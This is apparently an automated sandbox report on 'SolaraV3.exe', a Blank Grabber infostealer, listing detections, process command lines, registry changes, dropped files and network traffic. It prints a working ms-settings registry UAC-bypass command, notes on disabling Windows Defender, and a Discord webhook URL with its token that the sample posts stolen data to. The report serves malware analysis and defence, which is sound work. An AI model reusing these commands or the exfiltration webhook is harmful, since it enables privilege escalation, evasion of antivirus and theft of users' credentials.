File name: | SolaraV3.exe |
Full analysis: | https://app.any.run/tasks/0af5b7d0-ce94-41db-a356-02d0f662dd2d |
Verdict: | Malicious activity |
Threats: | Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks. Malware Trends Tracker>>> |
Analysis date: | September 29, 2024, 23:59:00 |
OS: | Windows 10 Professional (build: 19045, 64 bit) |
Tags: | uac evasion blankgrabber discord stealer exfiltration pyinstaller susp-powershell discordgrabber generic growtopia ims-api upx |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32+ executable (GUI) x86-64, for MS Windows |
MD5: | 031A05DC463314DF4904B6AAB7ABB56D |
SHA1: | D98F758B0126CC2BBFC59D38B23F59EBC8E21C18 |
SHA256: | |
SSDEEP: | 98304:66CwbRk+yQq4ANCz0dz3MCF7mbEelmPuxKS1HmTdozujquT3Jb3n64AMXGYwcnDr:y7/V1ppxy27bT |
ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
MALICIOUS
BlankGrabber has been detected
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
Bypass User Account Control (Modify registry)
- reg.exe (PID: 5244)
Bypass User Account Control (ComputerDefaults)
- ComputerDefaults.exe (PID: 4668)
Adds path to the Windows Defender exclusion list
- SolaraV3.exe (PID: 2268)
- cmd.exe (PID: 5212)
- cmd.exe (PID: 1964)
Antivirus name has been found in the command line (generic signature)
- cmd.exe (PID: 3916)
- MpCmdRun.exe (PID: 8152)
Windows Defender preferences modified via 'Set-MpPreference'
- cmd.exe (PID: 3916)
Bypass execution policy to execute commands
- powershell.exe (PID: 7248)
Changes powershell execution policy (Bypass)
- cmd.exe (PID: 3812)
GROWTOPIA has been detected (YARA)
- SolaraV3.exe (PID: 2268)
DISCORDGRABBER has been detected (YARA)
- SolaraV3.exe (PID: 2268)
BLANKGRABBER has been detected (SURICATA)
- SolaraV3.exe (PID: 2268)
Stealers network behavior
- SolaraV3.exe (PID: 2268)
Starts CMD.EXE for self-deleting
- SolaraV3.exe (PID: 2268)
SUSPICIOUS
Process drops legitimate windows executable
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
- SolaraV3.exe (PID: 2268)
Uses WEVTUTIL.EXE to query events from a log or log file
- cmd.exe (PID: 876)
- cmd.exe (PID: 6540)
Starts a Microsoft application from unusual location
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 3332)
- SolaraV3.exe (PID: 6780)
- SolaraV3.exe (PID: 2268)
Uses REG/REGEDIT.EXE to modify registry
- cmd.exe (PID: 6968)
- cmd.exe (PID: 6544)
- cmd.exe (PID: 7096)
The process drops C-runtime libraries
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
Process drops python dynamic module
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
Found strings related to reading or modifying Windows Defender settings
- SolaraV3.exe (PID: 3332)
- SolaraV3.exe (PID: 2268)
Application launched itself
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
Starts CMD.EXE for commands execution
- SolaraV3.exe (PID: 3332)
- SolaraV3.exe (PID: 2268)
Changes default file association
- reg.exe (PID: 5244)
Executable content was dropped or overwritten
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
- SolaraV3.exe (PID: 2268)
- csc.exe (PID: 8188)
Get information on the list of running processes
- SolaraV3.exe (PID: 2268)
- cmd.exe (PID: 1308)
- cmd.exe (PID: 4892)
- cmd.exe (PID: 1656)
- cmd.exe (PID: 4664)
Script disables Windows Defender's real-time protection
- cmd.exe (PID: 3916)
Script disables Windows Defender's IPS
- cmd.exe (PID: 3916)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 3916)
- cmd.exe (PID: 5212)
- cmd.exe (PID: 1964)
- cmd.exe (PID: 1460)
- cmd.exe (PID: 3812)
- cmd.exe (PID: 1224)
- cmd.exe (PID: 7636)
- cmd.exe (PID: 8028)
- cmd.exe (PID: 7316)
Uses WMIC.EXE to obtain Windows Installer data
- cmd.exe (PID: 6984)
- cmd.exe (PID: 876)
- cmd.exe (PID: 6032)
Uses WMIC.EXE to obtain a list of video controllers
- cmd.exe (PID: 3372)
- cmd.exe (PID: 3972)
- cmd.exe (PID: 6232)
Uses ATTRIB.EXE to modify file attributes
- cmd.exe (PID: 1156)
Script adds exclusion path to Windows Defender
- cmd.exe (PID: 1964)
- cmd.exe (PID: 5212)
Uses NETSH.EXE to obtain data on the network
- cmd.exe (PID: 532)
Starts application with an unusual extension
- cmd.exe (PID: 2064)
- cmd.exe (PID: 7660)
- cmd.exe (PID: 7404)
- cmd.exe (PID: 7776)
- cmd.exe (PID: 8024)
- cmd.exe (PID: 7908)
BASE64 encoded PowerShell command has been detected
- cmd.exe (PID: 3812)
Base64-obfuscated command line is found
- cmd.exe (PID: 3812)
Uses SYSTEMINFO.EXE to read the environment
- cmd.exe (PID: 4008)
The process bypasses the loading of PowerShell profile settings
- cmd.exe (PID: 3812)
CSC.EXE is used to compile C# code
- csc.exe (PID: 8188)
Possible usage of Discord/Telegram API has been detected (YARA)
- SolaraV3.exe (PID: 2268)
Uses WMIC.EXE to obtain operating system information
- cmd.exe (PID: 7840)
The executable file from the user directory is run by the CMD process
- rar.exe (PID: 4068)
Uses WMIC.EXE to obtain computer system information
- cmd.exe (PID: 8008)
Checks for external IP
- svchost.exe (PID: 2256)
- SolaraV3.exe (PID: 2268)
Runs PING.EXE to delay simulation
- cmd.exe (PID: 4560)
Hides command output
- cmd.exe (PID: 4560)
INFO
Create files in a temporary directory
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 3332)
- SolaraV3.exe (PID: 6780)
- SolaraV3.exe (PID: 2268)
Checks supported languages
- SolaraV3.exe (PID: 3332)
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
- SolaraV3.exe (PID: 2268)
Reads the computer name
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
The process uses the downloaded file
- cmd.exe (PID: 1336)
Reads security settings of Internet Explorer
- ComputerDefaults.exe (PID: 4668)
The Powershell gets current clipboard
- powershell.exe (PID: 1156)
PyInstaller has been detected (YARA)
- SolaraV3.exe (PID: 6780)
- SolaraV3.exe (PID: 2268)
Displays MAC addresses of computer network adapters
- getmac.exe (PID: 2932)
Found Base64 encoded reflection usage via PowerShell (YARA)
- SolaraV3.exe (PID: 2268)
UPX packer has been detected
- SolaraV3.exe (PID: 2268)
Attempting to use instant messaging service
- svchost.exe (PID: 2256)
- SolaraV3.exe (PID: 2268)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the
full reportims-api
(PID) Process(2268) SolaraV3.exe
Discord-Webhook-Tokens (1)1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc
Discord-Info-Links
1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc
Get Webhook Infohttps://discord.com/api/webhooks/1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc
No Malware configuration.
TRiD
.exe | | | Win64 Executable (generic) (87.3) |
---|---|---|
.exe | | | Generic Win/DOS Executable (6.3) |
.exe | | | DOS Executable Generic (6.3) |
EXIF
EXE
ProductVersion: | 10.0.19041.1 |
---|---|
ProductName: | Microsoft® Windows® Operating System |
OriginalFileName: | XCOPY.EXE |
LegalCopyright: | © Microsoft Corporation. All rights reserved. |
InternalName: | xcopy |
FileVersion: | 10.0.19041.1 (WinBuild.160101.0800) |
FileDescription: | Extended Copy Utility |
CompanyName: | Microsoft Corporation |
CharacterSet: | Unicode |
LanguageCode: | English (U.S.) |
FileSubtype: | - |
ObjectFileType: | Executable application |
FileOS: | Windows NT 32-bit |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 10.0.19041.1 |
FileVersionNumber: | 10.0.19041.1 |
Subsystem: | Windows GUI |
SubsystemVersion: | 6 |
ImageVersion: | - |
OSVersion: | 6 |
EntryPoint: | 0xcdb0 |
UninitializedDataSize: | - |
InitializedDataSize: | 94208 |
CodeSize: | 172032 |
LinkerVersion: | 14.4 |
PEType: | PE32+ |
ImageFileCharacteristics: | Executable, Large address aware |
TimeStamp: | 2024:09:17 12:22:38+00:00 |
MachineType: | AMD AMD64 |
No data.
Total processes
257
Monitored processes
140
Malicious processes
8
Suspicious processes
5
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2108 | "C:\Users\admin\Desktop\SolaraV3.exe" | C:\Users\admin\Desktop\SolaraV3.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Extended Copy Utility Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
3332 | "C:\Users\admin\Desktop\SolaraV3.exe" | C:\Users\admin\Desktop\SolaraV3.exe | — | SolaraV3.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Extended Copy Utility Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6544 | C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\admin\Desktop\SolaraV3.exe" /f" | C:\Windows\System32\cmd.exe | — | SolaraV3.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6732 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5916 | reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\admin\Desktop\SolaraV3.exe" /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6968 | C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f" | C:\Windows\System32\cmd.exe | — | SolaraV3.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
3360 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5244 | reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
876 | C:\WINDOWS\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text" | C:\Windows\System32\cmd.exe | — | SolaraV3.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
400 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
Total events
60622
Read events
60610
Write events
8
Delete events
4
Modification events
(PID) Process: | (5244)reg.exe | Key: | HKEY_CLASSES_ROOT\ms-settings\shell\open\command |
Operation: | write | Name: | DelegateExecute |
Value: | |||
(PID) Process: | (4668)ComputerDefaults.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer |
Operation: | write | Name: | SlowContextMenuEntries |
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000 | |||
(PID) Process: | (4668)ComputerDefaults.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
Operation: | write | Name: | CachePrefix |
Value: | |||
(PID) Process: | (4668)ComputerDefaults.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
(PID) Process: | (4668)ComputerDefaults.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
(PID) Process: | (6592)reg.exe | Key: | HKEY_CLASSES_ROOT\ms-settings\shell\open\command |
Operation: | delete key | Name: | (default) |
Value: | |||
(PID) Process: | (6592)reg.exe | Key: | HKEY_CLASSES_ROOT\ms-settings\shell\open |
Operation: | delete key | Name: | (default) |
Value: | |||
(PID) Process: | (6592)reg.exe | Key: | HKEY_CLASSES_ROOT\ms-settings\shell |
Operation: | delete key | Name: | (default) |
Value: | |||
(PID) Process: | (6592)reg.exe | Key: | HKEY_CLASSES_ROOT\ms-settings |
Operation: | delete key | Name: | (default) |
Value: | |||
(PID) Process: | (2268)SolaraV3.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib |
Operation: | write | Name: | 1280x720x32(BGR 0) |
Value: 31,31,31,31 |
Executable files
38
Suspicious files
16
Text files
56
Unknown types
Dropped files
PID | Process | Filename | Type | |
---|---|---|---|---|
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_decimal.pyd | executable | |
MD5:B7012443C9C31FFD3AED70FE89AA82A0 | SHA256:3B92D5CA6268A5AD0E92E5E403C621C56B17933DEF9D8C31E69AB520C30930D9 | |||
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\VCRUNTIME140.dll | executable | |
MD5:BE8DBE2DC77EBE7F88F910C61AEC691A | SHA256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83 | |||
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\select.pyd | executable | |
MD5:33722C8CD45091D31AEF81D8A1B72FA8 | SHA256:366FCA0B27A34835129086C8CDE1E75C309849E37091DB4ADEDA1BE508F2EE12 | |||
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_ssl.pyd | executable | |
MD5:E33BF2BC6C19BF37C3CC8BAC6843D886 | SHA256:E3532D3F8C5E54371F827B9E6D0FEE175AD0B2B17E25C26FDFB4EFD5126B7288 | |||
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_ctypes.pyd | executable | |
MD5:FA360B7044312E7404704E1A485876D2 | SHA256:F06C3491438F6685938789C319731DDF64BA1DA02CD71F43AB8829AF0E3F4E2F | |||
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_socket.pyd | executable | |
MD5:DA0DC29C413DFB5646D3D0818D875571 | SHA256:C3365AD1FEE140B4246F06DE805422762358A782757B308F796E302FE0F5AAF8 | |||
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\python312.dll | executable | |
MD5:EB02B8268D6EA28DB0EA71BFE24B15D6 | SHA256:80222651A93099A906BE55044024D32E93B841C83554359D6E605D50D11E2E70 | |||
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_queue.pyd | executable | |
MD5:326E66D3CF98D0FA1DB2E4C9F1D73E31 | SHA256:BF6A8C5872D995EDAB5918491FA8721E7D1B730F66C8404EE760C1E30CB1F40E | |||
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\rar.exe | executable | |
MD5:9C223575AE5B9544BC3D69AC6364F75E | SHA256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213 | |||
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\blank.aes | binary | |
MD5:A10E5E525212B9C2F73ED543991E8F4F | SHA256:D44B86328D878BA031E9A9CDE119EC15674FEF1D2B65B2CB3E8ED82ABC05A8DC |
Download PCAP, analyze network streams, HTTP content and a lot more at the
full reportHTTP(S) requests
5
TCP/UDP connections
30
DNS requests
8
Threats
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 204 | 142.250.185.67:443 | https://gstatic.com/generate_204 | unknown | — | — | — |
2268 | SolaraV3.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/line/?fields=hosting | unknown | — | — | unknown |
7116 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
2268 | SolaraV3.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/json/?fields=225545 | unknown | — | — | unknown |
— | — | POST | 404 | 162.159.128.233:443 | https://discord.com/api/webhooks/1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc | unknown | binary | 45 b | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the
full reportConnections
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
7116 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
3888 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
7116 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | unknown |
7116 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
2268 | SolaraV3.exe | 208.95.112.1:80 | ip-api.com | TUT-AS | US | unknown |
2268 | SolaraV3.exe | 172.217.16.131:443 | gstatic.com | US | whitelisted | |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
2268 | SolaraV3.exe | 162.159.138.232:443 | discord.com | CLOUDFLARENET | — | unknown |
DNS requests
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
blank-3jsck.in |
| unknown |
ip-api.com |
| shared |
gstatic.com |
| whitelisted |
discord.com |
| whitelisted |
Threats
PID | Process | Class | Message |
---|---|---|---|
2256 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com) |
2256 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com) |
2268 | SolaraV3.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com |
2256 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discord .com) |
2268 | SolaraV3.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com |
2268 | SolaraV3.exe | A Network Trojan was detected | STEALER [ANY.RUN] BlankGrabber (SkochGrabber) Generic External IP Check |
2268 | SolaraV3.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
— | — | Successful Credential Theft Detected | SUSPICIOUS [ANY.RUN] Host Name Exfiltration Atempt |
No debug info